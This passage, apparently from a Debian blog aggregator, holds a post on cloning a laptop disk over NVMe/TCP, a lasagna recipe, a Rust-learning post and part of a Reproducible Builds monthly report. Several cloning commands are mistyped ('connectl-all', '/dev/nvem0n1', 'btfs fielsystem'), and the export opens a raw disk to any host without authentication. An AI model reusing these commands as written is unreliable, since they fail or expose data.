<ul><li>… <a href="https://tracker.debian.org/libahp-xc">libahp-xc</a></li></ul>
<h3><strong>Debian IoT</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/pyicloud">libjwt</a> to fix a CVE</li></ul>alteholzhttp://blog.alteholz.euCloning a laptop over NVME TCPtag:copyninja.in,2024-03-10:/blog/clone_laptop_nvmet.html2024-03-10T11:45:00+00:00<p>Recently, I got a new laptop and had to set it up so I could start using it. But
I wasn't really in the mood to go through the same old steps which I had
explained in this <a class="reference external" href="https://copyninja.in/blog/live_install_debian.html">post earlier</a>. I was complaining about
this to my colleague, and there came the suggestion of why not copy the entire
disk to the new laptop. Though it sounded like an interesting idea to me, I had
my doubts, so here is what I told him in return.</p>
<ol class="arabic simple">
<li>I don't have the tools to open my old laptop and connect the new disk over
USB to my new laptop.</li>
<li>I use full disk encryption, and my old laptop has a 512GB disk, whereas the
new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.</li>
</ol>
<p>He promptly suggested both could be done. For step 1, just expose the disk using
NVME over TCP and connect it over the network and do a full disk copy, and the
rest is pretty simple to achieve. In short, he suggested the following:</p>
<ol class="arabic simple">
<li>Export the disk using nvmet-tcp from the old laptop.</li>
<li>Do a disk copy to the new laptop.</li>
<li>Resize the partition to use the full 1TB.</li>
<li>Resize LUKS.</li>
<li>Finally, resize the BTRFS root disk.</li>
</ol>
<div class="section" id="exporting-disk-over-nvme-tcp">
<h2>Exporting Disk over NVME TCP</h2>
<p>The easiest way suggested by my colleague to do this is using
<a class="reference external" href="https://www.freedesktop.org/software/systemd/man/latest/systemd-storagetm.service.html">systemd-storagetm.service</a>.
This service can be invoked by simply booting into <em>storage-target-mode.target</em>
by specifying <em>rd.systemd.unit=storage-target-mode.target</em>. But he suggested not
to use this as I need to tweak the dracut initrd image to involve network
services as well as configuring WiFi from this mode is a painful thing to do.</p>
<p>So alternatively, I simply booted both my laptops with GRML rescue CD. And the
following step was done to export the NVME disk on my current laptop using the
nvmet-tcp module of Linux:</p>
<div class="highlight"><pre><span></span>modprobe<span class="w"> </span>nvmet-tcp
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet
mkdir<span class="w"> </span>ports/0
<span class="nb">cd</span><span class="w"> </span>ports/0
<span class="nb">echo</span><span class="w"> </span><span class="s2">"ipv4"</span><span class="w"> </span>><span class="w"> </span>addr_adrfam
<span class="nb">echo</span><span class="w"> </span><span class="m">0</span>.0.0.0<span class="w"> </span>><span class="w"> </span>addr_traaddr
<span class="nb">echo</span><span class="w"> </span><span class="m">4420</span><span class="w"> </span>><span class="w"> </span>addr_trsvcid
<span class="nb">echo</span><span class="w"> </span>tcp<span class="w"> </span>><span class="w"> </span>addr_trtype
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet/subsystems
mkdir<span class="w"> </span>testnqn
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>>testnqn/allow_any_host
mkdir<span class="w"> </span>testnqn/namespaces/1
<span class="nb">cd</span><span class="w"> </span>testnqn
<span class="c1"># replace the device name with the disk you want to export</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"/dev/nvme0n1"</span><span class="w"> </span>><span class="w"> </span>namespaces/1/device_path
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>><span class="w"> </span>namespaces/1/enable
ln<span class="w"> </span>-s<span class="w"> </span><span class="s2">"../../subsystems/testnqn"</span><span class="w"> </span>/sys/kernel/config/nvmet/ports/0/subsystems/testnqn
</pre></div>
<p>These steps ensure that the device is now exported using NVME over TCP. The next
step is to detect this on the new laptop and connect the device:</p>
<div class="highlight"><pre><span></span>nvme<span class="w"> </span>discover<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><ip><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
nvme<span class="w"> </span>connectl-all<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
</pre></div>
<p>Finally, <tt class="docutils literal">nvme list</tt> shows the device which is connected to the new laptop,
and we can proceed with the next step, which is to do the disk copy.</p>
</div>
<div class="section" id="copying-the-disk">
<h2>Copying the Disk</h2>
<p>I simply used the <tt class="docutils literal">dd</tt> command to copy the root disk to my new laptop. Since
the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it
took about 7 and a half hours to copy the entire 512GB to the new laptop. The
speed at which I was copying was about 18-20MB/s. The other option would have
been to create an initial partition and file system and do an rsync of the root
disk or use BTRFS itself for file system transfer.</p>
<div class="highlight"><pre><span></span>dd<span class="w"> </span><span class="k">if</span><span class="o">=</span>/dev/nvme2n1<span class="w"> </span><span class="nv">of</span><span class="o">=</span>/dev/nvme0n1<span class="w"> </span><span class="nv">status</span><span class="o">=</span>progress<span class="w"> </span><span class="nv">bs</span><span class="o">=</span>40M
</pre></div>
</div>
<div class="section" id="resizing-partition-and-luks-container">
<h2>Resizing Partition and LUKS Container</h2>
<p>The final part was very easy. When I launched <tt class="docutils literal">parted</tt>, it detected that the
partition table does not match the disk size and asked if it can fix it, and I
said yes. Next, I had to install <tt class="docutils literal"><span class="pre">cloud-guest-utils</span></tt> to get <tt class="docutils literal">growpart</tt> to
fix the second partition, and the following command extended the partition to
the full 1TB:</p>
<div class="highlight"><pre><span></span>growpart<span class="w"> </span>/dev/nvem0n1<span class="w"> </span>p2
</pre></div>
<p>Next, I used <tt class="docutils literal"><span class="pre">cryptsetup-resize</span></tt> to increase the LUKS container size.</p>
<div class="highlight"><pre><span></span>cryptsetup<span class="w"> </span>luksOpen<span class="w"> </span>/dev/nvme0n1p2<span class="w"> </span>ENC
cryptsetup<span class="w"> </span>resize<span class="w"> </span>ENC
</pre></div>
<p>Finally, I rebooted into the disk, and everything worked fine. After logging
into the system, I resized the BTRFS file system. BTRFS requires the system to
be mounted for resize, so I could not attempt it in live boot.</p>
<div class="highlight"><pre><span></span>btfs<span class="w"> </span>fielsystem<span class="w"> </span>resize<span class="w"> </span>max<span class="w"> </span>/
</pre></div>
</div>
<div class="section" id="conclussion">
<h2>Conclussion</h2>
<p>The only benefit of this entire process is that I have a new laptop, but I still
feel like I'm using my existing laptop. Typically, setting up a new laptop takes
about a week or two to completely get adjusted, but in this case, that entire
time is saved.</p>
<p>An added benefit is that I learned how to export disks using NVME over TCP,
thanks to my colleague. This new knowledge adds to the value of the experience.</p>
</div>copyninjahttps://copyninja.in/Low Fat, No Eggs, Lasagna-ishhttps://blog.trueelena.org/blog/drafts/low_fat_no_eggs_lasagna_ish/index.html2024-03-10T00:00:00+00:00<article>
<section class="header">
Posted on March 10, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Acooking.html" title="All pages tagged 'craft:cooking'.">craft:cooking</a>
</section>
<section>
<p>A few notes on what we had for lunch, to be able to repeat it after the
summer.</p>
<p>There were a number of food intolerance related restrictions which meant
that the traditional lasagna recipe wasn’t an option; the result still
tasted good, but it was a bit softer and messier to take out of the pan
and into the dishes.</p>
<p>On Saturday afternoon we made fresh no-egg pasta with 200 g (durum)
flour and 100 g water, after about 1 hour it was divided in 6 parts and
rolled to thickness #6 on the pasta machine.</p>
<p>Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken
out of the freezer: this was a bit too little, 750 ml would have been
better.</p>
<p>On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of
flour, and the meat sauce was heated up.</p>
<p>Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and
7 layers of the two sauces, and left to cool down.</p>
<p>And on Sunday morning it was baked for 35 min in the oven at 180 °C.</p>
<p>With 3 people we only had about two thirds of it.</p>
<p>Next time I think we should try to use 400 - 500 g of flour (so that
it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and
divide it into 3 pans: one to eat the next day and two to freeze
(uncooked) for another day.</p>
<p>No pictures, because by the time I thought about writing a post we were
already more than halfway through eating it :)</p>
</section>
</article>Elena “of Valhalla”https://blog.trueelena.orgFinally learning some Rust - hello photo-backlog-exporter!https://k1024.org/posts/2024/2024-03-09-learning-rust-finally/2024-03-09T22:30:00+00:00<p>After 4? 5? or so years of wanting to learn Rust, over the past 4 or
so months I finally bit the bullet and found the motivation to write
some Rust. And the subject.</p>
<p>And I was, and still am, thoroughly surprised. It’s like someone took
Haskell, simplified it to some extents, and wrote a systems language
out of it. Writing Rust after Haskell seems easy, and pleasant, and you:</p>
<ul>
<li>don’t have to care about unintended laziness which causes memory
“leaks” (stuck memory, more like).</li>
<li>don’t have to care about GC eating too much of your multi-threaded
RTS.</li>
<li>can be happy that there’s lots of activity and buzz around the language.</li>
<li>can be happy for generating very small, efficient binaries that feel
right at home on Raspberry Pi, especially not the 5.</li>
<li>are very happy that error handling is done right (Option and Result,
not like Go…)</li>
</ul>
<p>On the other hand:</p>
<ul>
<li>there are no actual monads; the <code>?</code> operator kind-of-looks-like
being in <code>do</code> blocks, but only and only for Option and Result,
sadly.</li>
<li>there’s no <a href="https://www.stackage.org">Stackage</a>, it’s like having
only Hackage available, and you can hope all packages work together
well.</li>
<li>most packaging is designed to work only against upstream/online
crates.io, so offline packaging is doable but not “native” (from
what I’ve seen).</li>
</ul>
<p>However, overall, one can clearly see there’s more movement in Rust,
and the quality of some parts of the toolchain is better (looking at
you, rust-analyzer, compared to HLS).</p>
<p>So, with that, I’ve just tagged <a href="https://github.com/iustin/photo-backlog-exporter/releases/tag/v0.1.0">photo-backlog-exporter
v0.1.0</a>. It’s
a port of a Python script that was run as a textfile collector, which
meant updates every ~15 minutes, since it was a bit slow to start,
which I then rewrote in Go (but I don’t like Go the language, plus the
GC - if I have to deal with a GC, I’d rather write Haskell), then
finally rewrote in Rust.</p>
<p>What does this do? It exports metrics for Prometheus based on the
count, age and distribution of files in a directory. These files
being, for me, the pictures I still have to sort, cull and process,
because I never have enough free time to clear out the backlog. The
script is kind of designed to work together with Corydalis, but since
it doesn’t care about file content, it can also double (easily) as
simple “file count/age exporter”.</p>
<p>And to my surprise, writing in Rust is <em>soo</em> pleasant, that the
feature list is greater than the original Python script, and -
compared to that untested script - I’ve rather easily achieved a <em>very
high</em> coverage ratio. Rust has multiple types of tests, and the
combination allows getting pretty down to details on testing:</p>
<ul>
<li>region coverage: >80%</li>
<li>function coverage: >89% (so close here!)</li>
<li>line coverage: >95%</li>
</ul>
<p>I had to combine a (large) number of testing crates to get it
expressive enough, but it was worth the effort. The last find from
yesterday, <a href="https://docs.rs/crate/assert_cmd/latest"><code>assert_cmd</code></a>, is
excellent to describe testing/assertion in Rust itself, rather than
via a separate, new DSL, like I was using <code>shelltest</code> for, in Haskell.</p>
<p>To some extent, I feel like I found the missing arrow in the
quiver. Haskell is good, quite very good for some type of workloads,
but of course not all, and Rust complements that very nicely, with
lots of overlap (as expected). Python can fill in any quick-and-dirty
scripting needed. And I just need to learn more frontend, specifically
Typescript (the language, not referring to any specific
libraries/frameworks), and I’ll be ready for AI to take over coding
😅…</p>
<p>So, for now, I’ll need to split my free time coding between all of the
above, and keep exercising my skills. But so glad to have found a
<em>good</em> new language!</p>Iustin Pophttps://k1024.orgReproducible Builds in February 2024https://reproducible-builds.org/reports/2024-02/2024-03-09T16:53:13+00:00<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/reproducible-builds.png#right" /></a></p>
<p><strong>Welcome to the February 2024 report from the <a href="https://reproducible-builds.org">Reproducible Builds</a> project!</strong> In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.</p>
<hr />
<h3 id="reproducible-builds-at-fosdem-2024"><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">Reproducible Builds at FOSDEM 2024</a></h3>
<p><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fosdem.jpeg#right" /></a></p>
<p>Core Reproducible Builds developer Holger Levsen presented at the main track at <a href="https://fosdem.org/2024/">FOSDEM</a> on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.</p>
<p>However, please see our <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><strong>comprehensive FOSDEM 2024 news post</strong></a> for the full details and links.</p>
<p><br /></p>
<h3 id="maintainer-perspectives-on-open-source-software-security"><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a></h3>
<p><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/maintainer-perspectives.png#right" /></a></p>
<p>Bernhard M. Wiedemann spotted that a recent report entitled <a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a> written by Stephen Hendrick and Ashwin Ramaswami of the <a href="https://www.linuxfoundation.org/">Linux Foundation</a> sports an infographic which mentions that “<a href="https://www.linuxfoundation.org/hubfs/LF%20Research/MaintainerSecurityBPs_Infographic.pdf">56% of [polled] projects support reproducible builds</a>”.</p>
<p><br /></p>
<h3 id="three-new-reproducibility-related-academic-papers">Three new reproducibility-related academic papers</h3>
<p>A total of three separate scholarly papers related to Reproducible Builds have appeared this month:</p>
<p><a href="https://arxiv.org/abs/2401.14635"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2401.14635.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2401.14635"><em>Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors</em></a> by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (<a href="https://www.purdue.edu/">Purdue University</a>, Indiana, USA) is concerned with the problem that:</p>
<blockquote>
<p>Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (<a href="https://arxiv.org/abs/2401.14635">arXiv</a>, <a href="https://arxiv.org/pdf/2401.14635.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<p><a href="https://arxiv.org/abs/2402.00424"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2402.00424.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2402.00424"><em>Reproducibility of Build Environments through Space and Time</em></a> by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (<a href="https://www.ip-paris.fr/">Institut Polytechnique de Paris</a>, France) addresses:</p>
<blockquote>
<p>[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.</p>
</blockquote>
<p>The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million <a href="https://nixos.org/">Nix</a> packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision. (<a href="https://arxiv.org/abs/2402.00424">arXiv</a>, <a href="https://arxiv.org/pdf/2402.00424.pdf">full PDF</a>)</p>
<p><br /></p>
<p><a href="https://inria.hal.science/hal-04441579v2"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/msr24.png#right" /></a></p>
<p><a href="https://inria.hal.science/hal-04441579v2"><em>Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems</em></a> by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (<a href="https://www.inria.fr/en/inria-centre-rennes-university">Inria centre at Rennes University</a>, France):</p>
<blockquote>
<p>This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (<a href="https://inria.hal.science/hal-04441579v2">HAL Portal</a>, <a href="https://inria.hal.science/hal-04441579/file/msr24.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<h3 id="mailing-list-highlights">Mailing list highlights</h3>
<p>From <a href="https://lists.reproducible-builds.org/listinfo/rb-general/">our mailing list</a> this month:</p>
<ul>
<li>
<p>User <em>cen</em> posted a query asking “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003238.html">How to verify a package by rebuilding it locally on Debian</a>” which <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003240.html">received a followup from Vagrant Cascadian</a>.</p>
</li>
<li>
<p>James Addison asked “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003246.html">Two questions about build-path reproducibility in Debian</a>” regarding the differences in the testing performed by <a href="https://salsa.debian.org/salsa-ci-team/pipeline">Debian’s GitLab continuous integration (CI) pipeline</a> and the <a href="https://tests.reproducible-builds.org/debian/reproducible.html">Debian-specific testing performed by the Reproducible Builds project itself</a>, and followed this with a separate but related question regarding misconfigured <a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> configurations.</p>
</li>
</ul>
<p><br /></p>
<h3 id="distribution-work">Distribution work</h3>
<p><a href="https://debian.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/debian.png#right" /></a></p>
<p>In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to <a href="https://tests.reproducible-builds.org/debian/index_issues.html">Debian’s knowledge about identified issues</a>. A number of issue types were updated as well. <a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/bcae685e">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/a3137bef">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/6ac62ef7">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/c272b790">[…]</a> In addition, Roland Clobus posted his 23rd <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003251.html">update of the status of reproducible ISO images</a> on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with <em>bullseye</em>, <em>bookworm</em>, <em>trixie</em> and <em>sid</em> provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a <a href="https://wiki.debian.org/DebianEvents/de/2024/MiniDebCampHamburg">MiniDebCamp in Hamburg</a>. Furthermore, Roland also <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003233.html">responded in-depth</a> to a query about a <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-January/003217.html">previous report</a></p>
<p><br /></p>
<p><a href="https://github.com/keszybz/fedora-repro-build"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fedora.png#right" /></a></p>
<p><a href="https://fedoraproject.org/">Fedora</a> developer <a href="https://github.com/keszybz">Zbigniew Jędrzejewski-Szmek</a> announced a work-in-progress script called <a href="https://github.com/keszybz/fedora-repro-build"><code class="language-plaintext highlighter-rouge">fedora-repro-build</code></a> that attempts to reproduce an existing package within a <a href="https://pagure.io/koji/">koji</a> build environment. Although the <a href="https://github.com/keszybz/fedora-repro-build#readme">projects’ <code class="language-plaintext highlighter-rouge">README</code> file</a> lists a number of “fields will always or almost always vary” and there is a non-zero <a href="https://pagure.io/fedora-reproducible-builds/project/issues?tags=irreproducibility">list of other known issues</a>, this is an excellent first step towards full Fedora reproducibility.</p>
<p><br /></p>
<p><a href="https://archlinux.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/archlinux.png#right" /></a></p>
<p>Jelle van der Waa <a href="https://gitlab.archlinux.org/pacman/namcap/-/merge_requests/64">introduced a new linter rule</a> for <a href="https://archlinux.org/">Arch Linux</a> packages in order to detect cache files leftover by the <a href="https://www.sphinx-doc.org/en/master/">Sphinx documentation generator</a> which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.</p>
<p><br /></p>
<p><a href="https://www.opensuse.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/opensuse.png#right" /></a></p>
<p>Elsewhere, Bernhard M. Wiedemann posted another <a href="https://lists.opensuse.org/archives/list/factory@lists.opensuse.org/thread/I66U56F5R3TR4ZTLYGPSGWINNOLZ7XP4/">monthly update</a> for his work elsewhere in openSUSE.</p>
<p><br /></p>
<h3 id="diffoscope"><a href="https://diffoscope.org"><em>diffoscope</em></a></h3>
<p><a href="https://diffoscope.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/diffoscope.png#right" /></a></p>
<p><a href="https://diffoscope.org">diffoscope</a> is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions <code class="language-plaintext highlighter-rouge">256</code>, <code class="language-plaintext highlighter-rouge">257</code> and <code class="language-plaintext highlighter-rouge">258</code> to Debian and made the following additional changes:</p>
<ul>
<li>Use a deterministic name instead of trusting <code class="language-plaintext highlighter-rouge">gpg</code>’s –use-embedded-filenames. Many thanks to Daniel Kahn Gillmor <a href="mailto:dkg@debian.org">dkg@debian.org</a> for reporting this issue and providing feedback. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/458f7f04">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/18d69030">…</a>]</li>
<li>Don’t error-out with a traceback if we encounter <code class="language-plaintext highlighter-rouge">struct.unpack</code>-related errors when parsing Python <code class="language-plaintext highlighter-rouge">.pyc</code> files. (<a href="https://bugs.debian.org/1064973">#1064973</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/466523ac">…</a>]</li>
<li>Don’t try and compare <code class="language-plaintext highlighter-rouge">rdb_expected_diff</code> on non-GNU systems as <code class="language-plaintext highlighter-rouge">%p</code> formatting can vary, especially with respect to MacOS. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/c09d0a9e">…</a>]</li>
<li>Fix compatibility with <a href="https://docs.pytest.org/en/8.0.x/"><code class="language-plaintext highlighter-rouge">pytest</code></a> 8.0. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/ce04e0dd">…</a>]</li>
<li>Temporarily fix support for Python 3.11.8. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/5e6cfbf0">…</a>]</li>
<li>Use the <code class="language-plaintext highlighter-rouge">7zip</code> package (over <code class="language-plaintext highlighter-rouge">p7zip-full</code>) after a Debian package transition. (<a href="https://bugs.debian.org/1063559">#1063559</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/43ee3684">…</a>]</li>
<li>Bump the minimum <a href="https://black.readthedocs.io/en/stable/">Black source code reformatter</a> requirement to 24.1.1+. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/00418fb4">…</a>]</li>
<li>Expand an older changelog entry with a CVE reference. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/86645633">…</a>]</li>
<li>Make <code class="language-plaintext highlighter-rouge">test_zip</code> black clean. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/10c0c6fc">…</a>]</li>
</ul>
<p>In addition, James Addison contributed a patch to parse the headers from the <code class="language-plaintext highlighter-rouge">diff(1)</code> correctly [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/4648dcfa">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/fa73fc2b">…</a>] — thanks! And lastly, Vagrant Cascadian pushed updates in <a href="https://guix.gnu.org/">GNU Guix</a> for diffoscope to version <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=9d52585ebd4d759607eacfef31144676b08edc81">255</a>, <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=30196aec07dab8cc0f4a614b160f1857377a6a84">256</a>, and <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=16ab67182bc1e5b046caee9a2e38b71159703f34">258</a>, and updated <em>trydiffoscope</em> to <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=f45d05133472a9da13eae20ba4a676c696682c90">67.0.6</a>.</p>
<p><br /></p>
<h3 id="reprotest"><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a></h3>
<p><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:</p>
<ul>
<li>Create a (working) proof of concept for enabling a specific number of CPUs. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/cab6270">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9d0562d">…</a>]</li>
<li>Consistently use 398 days for time variation rather than choosing randomly and update <code class="language-plaintext highlighter-rouge">README.rst</code> to match. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/86365b5">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/57ab249">…</a>]</li>
<li>Support a new <code class="language-plaintext highlighter-rouge">--vary=build_path.path</code> option. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/f94904b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9ea2e4b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9b0f5dc">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/94e66c4">…</a>]</li>
</ul>
<p><br /></p>
<h3 id="website-updates">Website updates</h3>
<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/website.png#right" /></a></p>
<p>There were made a number of improvements to our website this month, including:</p>
<ul>
<li>
<p>Chris Lamb:</p>
<ul>
<li>Improve the relative sizing of headers. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3243e14b">…</a>]</li>
<li>Re-order and “punch” up the introduction and documentation on the <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> page. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/05a76405">…</a>]</li>
<li>Update <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> documentation re. <code class="language-plaintext highlighter-rouge">datetime.datetime.fromtimestamp</code>. Thanks, James Addison. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/502769f1">…</a>]</li>
<li>Add a <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">post about Reproducible Builds at FOSDEM 2024</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/b09d3c22">…</a>]</li>
</ul>
</li>
<li>
<p>Holger Levsen:</p>
<ul>
<li>Update the <a href="https://reproducible-builds.org/projects/guix">GNU Guix</a> page to include their <a href="https://qa.guix.gnu.org/reproducible-builds">reproducibility QA page</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/d33582dc">…</a>]</li>
<li>Add Sune Vuorela and Jan-Benedict Glaw to our contributors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3bed935a">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/8bf556b5">…</a>]</li>
</ul>
</li>
<li>
<p>Mattia Rizzolo:</p>
<ul>
<li>Add <a href="https://www.sovereigntechfund.de/">Sovereign Tech Fund</a>’s logo to our sponsors. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/a54f6e20">…</a>]</li>
<li>Update our sponsors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/de187090">…</a>]</li>
</ul>
</li>
</ul>
<p><br /></p>
<h3 id="reproducibility-testing-framework">Reproducibility testing framework</h3>
<p><a href="https://tests.reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/testframework.png#right" /></a></p>
<p>The Reproducible Builds project operates a comprehensive testing framework (available at <a href="https://tests.reproducible-builds.org"><em>tests.reproducible-builds.org</em></a>) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:</p>
<ul>
<li>
<p><a href="https://debian.org/">Debian</a>-related changes:</p>
<ul>
<li>Temporarily disable upgrading/bootstrapping Debian <em>unstable</em> and <em>experimental</em> as they are currently broken. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/ef88cc3ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7ed553444">…</a>]</li>
<li>Use the 64-bit <code class="language-plaintext highlighter-rouge">amd64</code> kernel on all <code class="language-plaintext highlighter-rouge">i386</code> nodes; no more 686 <a href="https://en.wikipedia.org/wiki/Physical_Address_Extension">PAE</a> kernels. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/53c3c39bd">…</a>]</li>
<li>Add an <a href="https://www.erlang.org/">Erlang</a> package set. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/d29d41e3b">…</a>]</li>
</ul>
</li>
<li>
<p>Other changes:</p>
<ul>
<li>Grant Jan-Benedict Glaw shell access to the Jenkins node. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/252598e99">…</a>]</li>
